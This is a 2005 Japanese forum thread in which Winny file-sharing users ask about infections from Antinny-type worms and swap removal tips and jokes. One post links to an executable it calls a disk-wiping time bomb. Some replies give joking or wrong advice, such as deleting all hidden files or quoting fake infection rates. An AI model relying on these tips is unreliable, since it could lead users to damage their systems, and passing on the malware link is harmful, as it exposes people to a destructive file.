絵を描くパレットの左上に「閉じる」ボタンがあり、操作できない状態です
【何をしたらそんなことになったのか】友人のDLした圧縮ファイルを開封した為
【これまでにとった措置】感染元となったwinnyを完全消去
レジストリ・スタートアップの怪しいもの削除。復元も一旦機能を停止させて削除。

絵描き掲示板関連が操作できないのが痛手です・・
JPEG閲覧不可ググっても対処法が出ず。非常に困ってます
しかしフォルダ上からは見れないはずのJPEGファイルが小さく4つ見えるのです
フォトエディタのプログラムを改変させられたのでしょうか?
どうすれば直るか自身ではわかりませんお力添えをお願いいたします。
86[名無し]さん(bin+cue).rar:05/02/23 00:39:30 ID:xxD+ISEj0
87[名無し]さん(bin+cue).rar:05/02/23 00:39:33 ID:TUEyJ1Yy0
感染ありなら、そのウイルスの名称でぐぐるくらいのことはしてる
よな?
88[名無し]さん(bin+cue).rar:05/02/23 01:15:44 ID:UPqliwYi0
キンタマの駆除で色々実行中です。OSはmeです。nyから感染しました。
その手順にプログラムファイルの怪しいexeテキスト(フォルダー)を
削除とありますが、開こうとすると「zipが壊れて」云々のフォルダーはやはり、
擬装フォルダーなので削除でしょうか?特に「斜め」のアイコンになっている
フォルダーがそうなります。
89[名無し]さん(bin+cue).rar:05/02/23 01:19:19 ID:HSoLqlAe0
ところで全然関係ないんだけど、
我が家のウィニィがポート25を通して外部に接続しようとするんだが、
これはウィルス?
バスターでは反応しないんだが。
90[名無し]さん(bin+cue).rar:05/02/23 01:50:43 ID:0HIeF0Dp0
>>88
「削除」と書いてあるのに開こうとするのか。
書き間違いか、それとも知識が不足しているのかどっちだ?

>>89
全然関係ないとか予防線張るくらいなら初めから書くなと。
ローカルの25だったら、そりゃよっぽど珍奇なOSだな、少なくともRFC違反だ。
リモートの25と本当にnyが通信しているだけなら下衆の勘ぐりってやつ。
91[名無し]さん(bin+cue).rar:05/02/23 01:58:08 ID:RDdo7J1X0
頼む、おまいの弟子にしてくれ
92[名無し]さん(bin+cue).rar:05/02/23 02:00:26 ID:HSoLqlAe0
>>90
なるへそ。
初歩からネットワークを勉強してみるか。
ありがとう。
93[名無し]さん(bin+cue).rar:05/02/23 03:44:48 ID:8dcB9qdZ0
総合質問のところでも書いたのですが
セキュリティーの問題上nyはProglam Filesには置かないようにと
書いてありましたが理由がのってませんでした。
わかる人いたら教えて下さい!
ちなみにみんなはどこに置いてますか??
94[名無し]さん(bin+cue).rar:05/02/23 03:48:32 ID:YUwDzl0b0
Program Filesだとnyのフォルダを探されやすいからだろう。
もっとも、そんな決め打ちしてくるような手抜きなウイルスもどうかと思うけどな。
ひっかかるほうもまぁアレだが。
95[名無し]さん(bin+cue).rar:05/02/23 03:50:10 ID:iztordRQ0
>>93
マルチされると答える気が失せるのは俺だけだろうか?しかもわざわざageって書かんでも・・・
96[名無し]さん(bin+cue).rar:05/02/23 04:02:06 ID:8dcB9qdZ0
>>95ごめんなさい。次から気をつけます!
>>94だったらどんなソフトでもまとめてProgram Filesで問題無しってことですか??
97[名無し]さん(bin+cue).rar:05/02/23 04:54:22 ID:xODVFvyr0
>>94
アホか
98[名無し]さん(bin+cue).rar:05/02/23 06:25:31 ID:6g94NrYz0
このスレ的には
”セキュリティーの問題上nyはProglam Filesには置かないように”
なんつーことは言わず、
”セキュリティーの問題上、nyは個人情報等を扱わないPC(専用PCが望ましい)で稼動させるように”
だな。専用PC上ではnyはどこに置こうが好きにすりゃいいわけで
99[名無し]さん(bin+cue).rar:05/02/23 07:26:47 ID:7VZqI3M20
【使用OS】WindowsXP
【WindowsUpdateしてるか】しています
【使用AntiVirusソフト】ウイルスバスター
【AntiVirusをUpdateしてるか】しています
【ウイルススキャンの結果】感染なし
【オンラインスキャンしたなら結果】感染なし
【Winnyのバージョン】v2,0 b7.1
【Winny歴、総DL量】2年くらい
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】わかる範囲でしました
【症状、具体的に分かる限りすべて書く】症状はとくにありません
【これまでにとった措置】 【Winny】映画総合【マタリ】 【特撮】好物あんぱん【特撮】 【もせ】音楽情報交換スレ【アルバム】 safeny.zip
をWinRARで解凍しようとするとウイルスバスターが作動してWORM_ANTINNY.Lが検出しました。
そしてそのまま解凍できずにウイルスバスターが隔離しました。
中にはTrack00.exeが入っていたようですがクリックはしていません。
またテンプレにある感染確認方法を一通り試したのですがどれもあてはまりません。
解凍しようとした時点でウイルスに感染しているのでしょうか?
10099:05/02/23 07:38:18 ID:7VZqI3M20
スレよごしてごめんなさい
テンプレまとめサイトのFAQ1に思いっきりこう書いていた
Q.ファイルを解凍するだけでウィルスに感染することってあるんですか?
 動画/音声ファイルを再生するだけでウィルスに感染したりしますか?
A.そのファイルを開くアプリにバグが無い限り、そういったことは有り得ません。
101[名無し]さん(bin+cue).rar:05/02/23 07:40:39 ID:eb9tl9et0
【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】しています
【使用AntiVirusソフト】ですノートン
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】ノートン、0
【オンラインスキャンしたなら結果】 トレンドマイクロ 感染なし
【Winnyのバージョン】0 b7.1
【Winny歴、総DL量】1週間、30G 
【テンプレを読んだか】よく読みました
【テンプレにある対策を実行したか】該当らしいものがどれかわからないです。
【症状、具体的に分かる限りすべて書く】おとしたファイルは全部スキャン
したり、解凍後もフォルダやファイルのプロパティなどチェックして、最新の注意はしてました。
表示の設定で隠しファイルを表示にしてからか問題が起きました。 Cドバイブとか
に見たことの無い透き通ったファイルやフォルダなどが、沢山でるようになりました。
【何をしたらそんなことになったのか】 exeとからのものはクリックしてないと思います。
【これまでにとった措置】 不安でふて寝。

まだウイルスによる症状らしきものはでてないとおもうんですが、
よくわかりません。お願いします。
102[名無し]さん(bin+cue).rar:05/02/23 07:43:02 ID:iztordRQ0
>>101
表示の設定で隠しファイルを表示にしたから
103[名無し]さん(bin+cue).rar:05/02/23 07:46:18 ID:6g94NrYz0



                                  バイブ
に         透き通った            が、沢山
104[名無し]さん(bin+cue).rar:05/02/23 08:37:22 ID:qNBaFbDP0
>101
それウィルス
透明なの全部削除汁
105[名無し]さん(bin+cue).rar:05/02/23 09:24:36 ID:7Btp7RiE0
更新済みのノートンせんせに反応しない時限ハードディスク消去
exeふんだんだけど新種?ちなみにこれ
http://tokyo.cool.ne.jp/hghjkkkkkjihyg/data/bobo_20050223092358.exe.html
106[名無し]さん(bin+cue).rar:05/02/23 09:26:24 ID:YZnlaIIN0
>101 見たことの無い透き通ったファイルやフォルダ
常識で考えればそれが「隠しファイル」だということは判りそうなものだが。
てか、釣りだよな?
107[名無し]さん(bin+cue).rar:05/02/23 10:46:42 ID:PpUVy7Bd0
タスクマネージャの復活方法わかったー!
前スレで誰かが言ってたように、正常なPCから
TASKMGR.EXEをコピーして上書きすればいいだけ。
元は85KBくらいのものが10KBくらいにされてた。
108[名無し]さん(bin+cue).rar:05/02/23 10:47:38 ID:PpUVy7Bd0
スタートからシャットダウンが消えてるのは
「窓の手」なんかで元に戻せる。
109[名無し]さん(bin+cue).rar:05/02/23 10:48:48 ID:L/Pi4Y2K0
にゅるぽにゅいるす
110[名無し]さん(bin+cue).rar:05/02/23 10:59:55 ID:ZLeH7N/10
>>109
ニャッ!!
111[名無し]さん(bin+cue).rar:05/02/23 20:58:44 ID:hZaBdmtv0
>>666はまだいるか?
112666:05/02/23 21:06:59 ID:sByWJQva0
ちーっす
113[名無し]さん(bin+cue).rar:05/02/24 00:27:40 ID:/lJn47AJ0
exeクリックしてキンタマか!?って思ったんだが調べても痕跡がない。
感染確認一通りしてみたが…
それと
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ファイル名を指定して実行でやってみたが見つからない。
なんでだろう…
114[名無し]さん(bin+cue).rar:05/02/24 00:34:30 ID:fk9RmKiu0
>>113
The Ultimate WAROSU
115[名無し]さん(bin+cue).rar:05/02/24 00:40:40 ID:j6CzBfJN0
>>113
もうHDを窓から投げ捨てるしかないな。
116[名無し]さん(bin+cue).rar:05/02/24 00:42:46 ID:/lJn47AJ0
OK
アンティニーGだったよ。
修復してくる。
117[名無し]さん(bin+cue).rar:05/02/24 02:46:09 ID:1YKb2+7t0
>>112
スキャンとかで何か反応はあったか?
問題はまだあるか?
118[名無し]さん(bin+cue).rar:05/02/24 03:08:18 ID:TFROHsri0
昨日初めて、キンタマ踏んだが(寝不足でボーとしていたら踏んでしまっていた)
先生がちゃんとシステム監視してくれていて、発症前に防げたよ。
アリガトウ先生。グッジョブ
                  ∩
                  ( ⌒)      ∩_ _ グッジョブ!!
                 /,. ノ      i .,,E)
             / /"      / /"
  _n  グッジョブ!!   / / _、_   ,/ ノ'
 ( l     _、 _   / / ,_ノ` )/ / _、_    グッジョブ!!
  \ \ ( <_,` )(       / ( ,_ノ` )     n
   ヽ___ ̄ ̄ ノ ヽ      |  ̄     \    ( E)
     /    /   \    ヽ フ    / ヽ ヽ_//


ウイルスソフトが必須だと(ry
119118:05/02/24 03:12:16 ID:TFROHsri0
訂正
ウイルスソフト
  ↓
アンチウイルス
120[名無し]さん(bin+cue).rar:05/02/24 03:23:34 ID:919WeEvT0
>>118
(((( ;゚Д゚)))ガクガクブルブル
121[名無し]さん(bin+cue).rar:05/02/24 04:14:00 ID:MiB40HBW0
>>118-119
君がなぜウイルス踏んだのかよくわかる気がする。
122[名無し]さん(bin+cue).rar:05/02/24 07:22:09 ID:qtawK1R70
アホばっか
123[名無し]さん(bin+cue).rar:05/02/24 08:33:09 ID:bGBW8hjw0
zip〜rarを一度WINRARとかで中身を覗いていれば
偽装フォルダとかexeに引っかかることないのにねぇ
124[名無し]さん(bin+cue).rar:05/02/24 12:04:20 ID:ZF2ysfOZ0
欄検眼段 に感染した模様だが、情報が少ない。誰か対処法しらない?
125[名無し]さん(bin+cue).rar:05/02/24 12:30:33 ID:uvHJfKar0
ちまちま感染後対処するくらいなら、ノートン幽霊やHD革命バックアップなどで
自分環境を焼いたブータブルCDを用意して即復帰した方が早いし精神的にもGood
備えあれば憂い無し

諦めてて初期化しなはれ
126[名無し]さん(bin+cue).rar:05/02/24 13:18:32 ID:ZF2ysfOZ0
Cドライブにwinny本体置いてあり、Cドライブを初期化するのも
可能ですが、他のドライブ(Dマイドキュメント等)は影響無いでしょうか?
他のドライブにもウイルス・ワームが潜んでいそうで怖いんですが。
 ちなみに症状ですが、他ドライブから主に画像データをCドライブ直下に
tempフォルダを作って、勝手にアップロードする模様。
 なお、ノートンは無反応です。他のドライブに影響が無いなら初期化します。
127[名無し]さん(bin+cue).rar:05/02/24 13:32:49 ID:O/PdLO1d0
俺のノートンウイルス除去してくれないんだけど
何コイツ…
128[名無し]さん(bin+cue).rar:05/02/24 13:34:40 ID:DewLRF/j0
>>126
確定情報が無い以上、他ドライブが安全とは言えん罠
全初期化が確実


つーか、俺ってage質厨に釣られてる?w
129[名無し]さん(bin+cue).rar:05/02/24 14:12:47 ID:wKcebRSS0
やっぱage房はスルーで
130[名無し]さん(bin+cue).rar:05/02/24 14:22:58 ID:GBIZJd2d0
ニュイルスは感染者が情報提供しないで質問だけしても、
何も得るものは無いって、どうして理解できないのか
131[名無し]さん(bin+cue).rar:05/02/24 14:36:13 ID:RgN4QGUW0
もの凄く初歩的な質問ですが、初期化するデメリットはデーターを完全に消す事でしょうが、
消すのを悔やまれる程の重要な(面倒な)モノとはナンでしょう?
全部入れ直せば済む事だと思うのですが…。
132[名無し]さん(bin+cue).rar:05/02/24 15:40:53 ID:5KD9RgnU0
>>131
>消すのを悔やまれる程の重要な(面倒な)モノとはナンでしょう?
君にそんなものはない。躊躇なく初期化してOK。
133[名無し]さん(bin+cue).rar:05/02/24 15:42:53 ID:TFROHsri0
>>123
でお前はWINRARの正規版を使っているのか?
134[名無し]さん(bin+cue).rar:05/02/24 16:21:20 ID:qtawK1R70
人生を初期化したい
135[名無し]さん(bin+cue).rar:05/02/24 16:49:40 ID:xWZnX3160
窪塚ダイブという手段がある。
136[名無し]さん(bin+cue).rar:05/02/24 16:57:48 ID:5EWzITZV0
    ,    ,、
    i!   ,ノミ
    !i   r' ミ
   ヽ('A`)ノノ`  I can fly !!
     ( )
      ヽヽ
137[名無し]さん(bin+cue).rar:05/02/24 17:02:17 ID:bVRiGf/w0
ニュイルス作者がはしゃいでおります
138[名無し]さん(bin+cue).rar:05/02/24 19:28:01 ID:8VX7siyl0
ノートン使ってるんだが来月買い替え予定
思いので乗り換えようかとも思ってるんだが
down板としてはお勧めは何?
139[名無し]さん(bin+cue).rar:05/02/24 19:31:21 ID:JC3RLv140
マジレスするとノートン
140[名無し]さん(bin+cue).rar:05/02/24 20:56:10 ID:b9wJ6aMY0
【使用OS】 XP Home SP1
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 avast!
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 感染(しかし何がそうしているのかわからず)
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 どれかわからない
【症状、具体的に分かる限りすべて書く】
変なexeを間違えて起動したら時限式HDD削除と出てきました。
強制終了で事なきを得ましたが、再起動するたびに起動中画面(ようこそ)で初期化が実行されます。
ボタンを押せばキャンセルできるのですが、毎回起動する度になります。
【何をしたらそんなことになったのか】
間違えてexeファイルを起動させてしまった。
【これまでにとった措置】
avast!でスキャンして感染していたファイルを削除したが、
それだけでいいのかわからないので怖くて再起動できない
141[名無し]さん(bin+cue).rar:05/02/24 21:03:40 ID:aUOm+MmU0
>>140
再インスコ。
142[名無し]さん(bin+cue).rar:05/02/24 21:06:29 ID:b9wJ6aMY0
>>141
それしかないですか?
143[名無し]さん(bin+cue).rar:05/02/24 21:07:27 ID:qtawK1R70
>>140
Safeモードでスタートアップ解除
たぶん
144[名無し]さん(bin+cue).rar:05/02/24 21:08:43 ID:d4Pr2mls0
一生再起動しなければええやん
145[名無し]さん(bin+cue).rar:05/02/24 21:25:22 ID:Z44Zt0XY0
>>138
ウィルスバスター
軽くてくせになりそう
146[名無し]さん(bin+cue).rar:05/02/24 21:33:28 ID:L149YBUr0
>>145
いや〜んエッチ
147[名無し]さん(bin+cue).rar:05/02/24 21:35:32 ID:8f2dbgBG0
みつをぬるぽってのは結局素性わかってないんですか?
今日踏んじまいました(´・ω・`)ショボーン

静かにしてるうちに、一応バックアップとっておいたほうがいいですよね_| ̄|○
148[名無し]さん(bin+cue).rar:05/02/24 21:51:58 ID:/kSECWFsO
おいらもみつおぬるぽをうっかり踏んじまったョ。orz
取りあえずデータ移して再フォーマット中。
バックアップは常にしときゃならんよね。
149[名無し]さん(bin+cue).rar:05/02/24 22:27:28 ID:HtNHtkJt0
>>143
セーフモードはわかるんですが、スタートアップ解除とは?
スタートアップの中に変なファイルはなかったんですが、そうじゃないのでしょうか?
150[名無し]さん(bin+cue).rar:05/02/24 22:41:27 ID:W6/6ccuE0
>>149
ファイル名を指定して実行→「msconfig」と入力
そこのスタートアップ見てみ。
151[名無し]さん(bin+cue).rar:05/02/25 00:28:41 ID:Qx8RfebQ0
>>133
意味不明。登録しなくても使えるじゃん
152[名無し]さん(bin+cue).rar:05/02/25 00:59:43 ID:BsGbFnTN0
>>150
セーフモードでスタートアップを全て無効にしてから再起動したが駄目だったorz

checking file system on C:
the type of the file system is NTFS.

とかなんとか出てくるんだ
どなたか助けてくださいorz
153[名無し]さん(bin+cue).rar:05/02/25 01:00:14 ID:A94mOpbK0
何が怖いって



     時 限 式 が 一 番 怖 い 
154[名無し]さん(bin+cue).rar:05/02/25 02:07:12 ID:Q3P6BIfB0
怖いのは熱いお茶だ
155[名無し]さん(bin+cue).rar:05/02/25 04:26:51 ID:GoRA7E8K0
>>152
>スタートアップを全て無効
ハゲワロスwwww
156[名無し]さん(bin+cue).rar:05/02/25 05:27:31 ID:tEbz9a7U0
( ・ω・)つ且
157[名無し]さん(bin+cue).rar:05/02/25 11:32:20 ID:1ZU2n9rV0
皆がダウンしたファイルの中で正常のとウイルス入りが混じってる比率は?
・・・って聞こうと思ったけど、圧倒的にエロが多いよね?
音楽とか映像なんかは少ないでしょ?
だから、聞き方を変える。エロばっかりダウンしてる人の中で、
ウイルス付きなのはどれぐらいの頻度で出ますか?
158[名無し]さん(bin+cue).rar:05/02/25 11:51:03 ID:Xi23TaQ80
>>157
比率なんか聞いて何の意味があるんだ?
Winnyのような怪しい出所から落としたファイルは全てスキャンしてから拡張子確認して実行するだけ
159[名無し]さん(bin+cue).rar:05/02/25 11:55:25 ID:h/DV2kpc0
俺は自分の美貌が怖い。あと才能。無いのは金だけ。
160[名無し]さん(bin+cue).rar:05/02/25 11:55:39 ID:zP25Dace0
むしろエロの方が低いだろ。
拡散度合いだけじゃなく人気度も考慮すれば、
ジャンプ最新号とかリリースされたばかりのCDとかが狙われてるのは明白
161[名無し]さん(bin+cue).rar:05/02/25 12:03:10 ID:1ZU2n9rV0
>>158
その通りなんですが、ある程度参考までにお願い出来ますか?
>>159
美貌ですか…。羨ましいですね。
>>160
なるほど。ではやはり全体に聞くべきですかね?
皆さん面倒くさいかもしれませんが、数字を提示して頂けないでしょうか?
162[名無し]さん(bin+cue).rar:05/02/25 12:03:50 ID:Uri2kC0y0
>>152
おまいのせいでディスプレイがコーヒーまみれになったじゃねーかw
163[名無し]さん(bin+cue).rar:05/02/25 12:05:17 ID:h/DV2kpc0
>>161
ごめん見栄張った。仕事もない。
164[名無し]さん(bin+cue).rar:05/02/25 12:10:11 ID:zP25Dace0
>>161
ウイルスなし 47%
ウイルス入り 63%

これでまんぞくか?
165[名無し]さん(bin+cue).rar:05/02/25 12:12:32 ID:Xi23TaQ80
>>164
笑わすなよwww
166[名無し]さん(bin+cue).rar:05/02/25 12:12:43 ID:h/DV2kpc0
>>164
足すと110%で10%も満足。
167[名無し]さん(bin+cue).rar:05/02/25 12:15:52 ID:1ZU2n9rV0
>>164
満足しました。ありがとうございました。
168[名無し]さん(bin+cue).rar:05/02/25 12:36:22 ID:N5pNn7rd0
>>89
> ところで全然関係ないんだけど、
> 我が家のウィニィがポート25を通して外部に接続しようとするんだが、
> これはウィルス?
> バスターでは反応しないんだが。
>

漏れもおんなじ症状。

ファイアフォールによれば、ウィニィからのマスメール送信(SMTP)。って何?
169[名無し]さん(bin+cue).rar:05/02/25 12:41:07 ID:Xi23TaQ80
170[名無し]さん(bin+cue).rar:05/02/25 13:06:56 ID:Nxf8nk470
PC立ち上げたら、タスクにweb1bedとかいうのが
出てPC重くなるんだが、これってウイルス?
171[名無し]さん(bin+cue).rar:05/02/25 13:11:53 ID:Xi23TaQ80
172[名無し]さん(bin+cue).rar:05/02/25 13:15:48 ID:Nxf8nk470
>>171
ありがとう〜
173[名無し]さん(bin+cue).rar:05/02/25 13:16:44 ID:N5pNn7rd0
>>169

アリガト。
2〜3日、試しにほど使ったけど、怖いから使うのやめます。
174[名無し]さん(bin+cue).rar:05/02/25 14:08:29 ID:GfKavashO
みつをぬるぽってどんな症状なの?
175[名無し]さん(bin+cue).rar:05/02/25 14:44:09 ID:N4/eIfEs0
>>168
それってさー、nyのポートを25番に設定してる奴がいて、
バスターのPFWがブロックしてるだけジャン。
nyのエラーログとPFWのブロックログがほぼ同時刻に
でてるはずだよ。
176[名無し]さん(bin+cue).rar :05/02/25 15:47:47 ID:TrlIquB70
>>174
・壁紙が相田みつお風味で「晒されたっていいじゃない 泥棒だもの ぬるぽ」
と書かれたものに変えられる
・スクリーンショットを撮られてマイドキュメントにあげられる

が主な症状だったと思う。詳しいことは忘れた。
俺もこれ感染しちまってさ、できるだけ対処したつもりだが今でも不安だ…
177174:05/02/25 16:41:18 ID:GfKavashO
>>176
情報ありがとう。んじゃ俺も感染したわ。
すぐ再インストルしたんだけど、やはりまだ不安。PCが不安定になった感がある。
178[名無し]さん(bin+cue).rar:05/02/25 16:53:24 ID:Pip6Oph10
みつをぬるぽ旬だな
179[名無し]さん(bin+cue).rar:05/02/25 17:48:43 ID:dDlTKbXi0
空きがあるはずのHDDが満杯になってた
作業スペースがいるので、要らないデータを削除しようと中を見た
作った覚えのないフォルダに、山ほど.exeや.lzhやデスクトップの.jpgが
なにか、様々な意味で色々と終わってしまったと思った瞬間であった…

ああーっ、アンチウイルスソフト更新切れで放置するんじゃなかったー
思い起こせば数ヶ月前、フォルダのアイコンをしたexeを踏んだんだっけ
その後、ny回りを見たけど変化無かったから「大丈夫」と思い込んだんだ

regeditは細工されておらず、妖しい起動exeを外すと、再起動の度に、
CのユーザーTEMP下と覚えのないフォルダに作られていた、新しい
引っ掛け用ファイルが作られなくなった。とりあえずはこれでよし
さぁ、もうちょっとしたらアンチウイルスソフトを買いに逝くか…

ウイルスが書き換えたUpFolder.txtが別のソフトのファイルだったんで、
実際にデスクトップ画面はうpされてなかったようだ
どうせデスクトップ画面じゃ俺様が誰か特定するのは不可能だし
でも、コレが流れてたらと思うと、もんのすげーはずかしー
180[名無し]さん(bin+cue).rar:05/02/25 18:02:08 ID:2S1QHUEV0
更新切れって何だ?
181[名無し]さん(bin+cue).rar:05/02/25 18:04:06 ID:P66Y6RJ30
ny立ち上げたら、まるでつながらないから調べてみたら、初期ノードのあるはずのテキストファイルが真っ白になってた。
さらに、変なテキストファイルが作成されてた。
(null)Noderef.txtとかってのと、もう一個(null)何とかってテキスト(うろ覚え)ってのが。
なにかわかりますか?
木曜の夕方までは普通に使えたんだけど…
182[名無し]さん(bin+cue).rar:05/02/25 18:07:38 ID:P66Y6RJ30
とりあえず、初期ノード登録しなおしたらまたつながったけど、不気味。
183[名無し]さん(bin+cue).rar:05/02/25 18:13:43 ID:P66Y6RJ30
自己解決、ぐぐったらありますた。
バグみたいですね。
184[名無し]さん(bin+cue).rar:05/02/25 18:15:35 ID:II0wQcwB0
アホばっか
185[名無し]さん(bin+cue).rar:05/02/25 18:37:50 ID:6BqBUn4s0
とニュイルス作者が申しております
186[名無し]さん(bin+cue).rar:05/02/25 18:39:43 ID:hAOz7mh00
>>184
そうは言うがな、
187[名無し]さん(bin+cue).rar:05/02/25 18:44:09 ID:1ZU2n9rV0
.exeをクリックするのは玄人の専売特許ですか?
188[名無し]さん(bin+cue).rar:05/02/25 19:16:38 ID:Pip6Oph10
偽装にだまされるにはどうすればいいの?
189[名無し]さん(bin+cue).rar:05/02/25 19:23:58 ID:kum6HXjY0
>>188
池沼になる
190[名無し]さん(bin+cue).rar:05/02/25 19:33:13 ID:toPNidNn0
拡張子表示→非表示に
詳細表示→アイコン表示に
変えたアイコン→デフォルトのアイコンに
191[名無し]さん(bin+cue).rar:05/02/25 20:51:14 ID:nBuCWm180
>>179
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

フリーでいいから入れておけと・・・
192[名無し]さん(bin+cue).rar:05/02/25 21:49:11 ID:Bd8woMwm0
winnyで音楽を落とす→確認もせずにCDに焼く→MDへ→聞く

『You are an idiot! ha-ha-hhahhaha-・・・』

( ゚д゚)ポカーン

そして2曲目は女の喘ぎ声・・・orz

黒毛和牛上塩タン焼680円じゃね〜のかよヽ(`Д´)ノ
193[名無し]さん(bin+cue).rar:05/02/25 22:02:11 ID:+aY585yA0
だからなんだ
194[名無し]さん(bin+cue).rar:05/02/25 22:07:21 ID:jvGSfdx90
>>192
これだろうねぇ〜。
http://www.itmedia.co.jp/enterprise/articles/0501/27/news022.html
喘ぎ声はギシアンかなぁ。
195[名無し]さん(bin+cue).rar:05/02/26 00:50:24 ID:Yogpgu/e0
みつをぬるぽに感染した俺のPCのデスクトップ画面見て
うちの姉貴がコーヒー吹きやがった・・
196[名無し]さん(bin+cue).rar:05/02/26 01:30:05 ID:OL7X9bwe0
そんなお姉様に萌えた

写真upしたら助けてやらないこともないかもしれんぞ?
197[名無し]さん(bin+cue).rar:05/02/26 02:29:30 ID:47F4fQhY0
>>192
こんなブラクラもあったよね
198[名無し]さん(bin+cue).rar:05/02/26 02:38:24 ID:zycj4N6P0
>>179
>アンチウイルスソフト更新切れで放置

ワラタ。
199[名無し]さん(bin+cue).rar:05/02/26 05:36:46 ID:JQtFBZjd0
みつをウィルスやっちゃった。既出のデスノで。
旬のウィルス踏むのは初体験なんで新鮮w
一瞬血の気は下がったし、まだ海のものとも山のものともつかないので
不安ではあるけど……。

いまのとこ、うちも壁紙変更以外の被害はないし不審なファイルも
みつからないです。
スレ汚しスマソ
200[名無し]さん(bin+cue).rar:05/02/26 05:54:48 ID:BQyMlMjS0
*.me11po やられました・・・
どうもupfolder.ini書き換えでupられたようです。
あまり情報ないですね。このニュイルス・・・orz


タシケテ
201[名無し]さん(bin+cue).rar:05/02/26 10:08:05 ID:ZYcqapGr0
噂のみつおぬるぽの壁紙ってどんなの?
見たい
202[名無し]さん(bin+cue).rar:05/02/26 10:54:20 ID:7OHw4aO60
欄検眼段のウィルスのかかってしまいました。
ウィルスバスターで検索しても見つかりませんでした。
直し方を教えてください
203147:05/02/26 11:29:43 ID:B43pWV+90
>>199
先日やらかした者です。

あの後、感染PCは感染後30分程度で気づいた後はネットワーク無効にして、必死こいて別PCでウイルスについて
調べましたが、みつをに関しては、ほかのキンタマのように、アップフォルダの自動生成とかレジストリ
いじりみたいのもぱっと見ない感じですよね。

これからOS再インスコします。バックアップファイルが汚染されてないことを願うのみです。

ユーザー名リアルネームのまま放置してたため、流れるとマジで凹みますorz
204[名無し]さん(bin+cue).rar:05/02/26 11:58:07 ID:sfutdGYD0
>>202
バスターを過信した君が悪い
あきらめて再インストールするがよろし
205[名無し]さん(bin+cue).rar:05/02/26 12:07:06 ID:8Axj7XjJ0
その前に報告しとけ
206[名無し]さん(bin+cue).rar:05/02/26 13:00:02 ID:5tZJw+qT0
ユーザー名リアルネーム&感染日時
207179:05/02/26 14:52:54 ID:RU60S3MD0
>>191さん、どもです。アンチウイルスは最新のものでないと意味無しでした
先生のインターネットセキュリティパック買ってきて、
updateかけてウイルス定義を最新にしてからウイルスチェック
先ほど終わりました

c:\Program Files以下に、既存ファイル名+で潜んでたW32Antinny.Kが2本
レジストリに細工して、自動起動してたのは1本だけだったんだが…
2回引っかかったって事かなぁ
他にも(多分)発症していないウイルスがポコポコと

何と言うか、確証の無い「大丈夫だろ」な思い込みって怖いっす
208[名無し]さん(bin+cue).rar:05/02/26 16:15:37 ID:WocQHON00
圧縮ファイルを解凍前にスキャンして検疫すれば全く問題無いよね?
209[名無し]さん(bin+cue).rar:05/02/26 16:18:38 ID:sfutdGYD0
>>208
このスレ及び過去スレ全部読め

アンチウイルスを過信するなと何度言えば分かるのか
210[名無し]さん(bin+cue).rar:05/02/26 16:52:59 ID:F2scY9py0
君も律儀だな
211195:05/02/26 17:11:51 ID:Yogpgu/e0
>>196
うちの姉の写真ですか・・

やめときな、あれはグロ画像だ。

212[名無し]さん(bin+cue).rar:05/02/26 17:15:21 ID:BjrG6L/b0
>>196はグロ画像掲示板の住人かもしれないじゃないか。(w
213[名無し]さん(bin+cue).rar:05/02/26 18:58:47 ID:k8NNIkpb0
うちのノートン先生が2002だから買い換えようと思うんだけど
マカフィーとこのままノートンどっちがいいかな?
214[名無し]さん(bin+cue).rar:05/02/26 19:12:04 ID:sfutdGYD0
>>213
こっちで聞いてくれ

一番いいセキュリティソフトはなんだ!!Part2
http://pc5.2ch.net/test/read.cgi/sec/1108107024/
215[名無し]さん(bin+cue).rar:05/02/26 19:16:42 ID:Kl2K32W20
っきゃろーーー
にゅいるすなんてなってっから
検索かかんなかったじゃねーかああ

っきゃろーーーー



>>213
pれマカフィーはやめとけ
216[名無し]さん(bin+cue).rar:05/02/26 22:32:52 ID:Ky2+yhgQ0
まだ懲りないの?.bmp(オロナミンCの宣伝みたいなの)
といっしょに流れてるフォルダ偽装exeって、解析されてるんだっけ?

いや、先生は反応しないのだが.....壁紙変更ワームなのかね
217[名無し]さん(bin+cue).rar:05/02/26 22:35:39 ID:sfutdGYD0
>>216
シマンテックに検体提出しといて
218[名無し]さん(bin+cue).rar:05/02/26 22:36:32 ID:76nJsn480
>>201
前スレより

412 名前: 409 [sage] 投稿日: 05/02/12 03:27:25 ID:m1VjmALg0
    壁紙うpしてみる 
    bmpだと2Mもあるからpngで。 
    ttp://sylphys.ddo.jp/upld2nd/pc/img-box/img20050212032102.png 
219[名無し]さん(bin+cue).rar:05/02/26 22:37:57 ID:76nJsn480
220[名無し]さん(bin+cue).rar:05/02/26 23:26:57 ID:mgZdWGWv0
>219
ワロス
221[名無し]さん(bin+cue).rar:05/02/26 23:30:09 ID:Vk5RhAg20
そして俺は何をミスったのか未だに理解できていない(`・ω・´)
222[名無し]さん(bin+cue).rar:05/02/27 00:07:23 ID:eGPOpcOb0
218のは最後に余計なスペースがある
223[名無し]さん(bin+cue).rar:05/02/27 00:45:19 ID:bUV6Sr8m0
先日、ウイルスに感染してしまった・・・・・・。
感染した時、上戸綾のオロナミンCのCMを模倣した画像が、画面いっぱいに広がったんだけど、
これはどのキンタマウイルスなのか、教えて下さい。
224[名無し]さん(bin+cue).rar:05/02/27 00:49:03 ID:xO8FZiZS0

  ∧,,∧
 (;`・ω・)  。・゚・⌒) チャーハン作るよ!!
 /   o━ヽニニフ))
 しー-J

        アッ! 。・゚・
  ∧,,∧ て     。・゚・。・゚・
 (; ´゚ω゚)て   //
 /   o━ヽニニフ
 しー-J    彡

  ∧,,∧ て
 (;´・ω・)て       ・゚・。・ ゚・。・゚・ 。・゚・
 /   o━ヽニニフ))    <○√
 しー-J.            ‖ オレが止めているうちにチャーハンを戻せ!
                 くく

     でも・・・、君が火傷しちゃうよ・・・
  ∧,,∧
 (;´・ω・)
 /   o━ヽニニフ))  ・゚・。・ ゚・。・゚・ 。・゚・
 しー-J.           <○√ 早く!早く!オレに構わず戻せ!
                 くく

  ∧,,∧ て チャーハンー!!
 (;´・ω・)て
 /   o━ヽニニフ))
 しー-J.                    グシャ
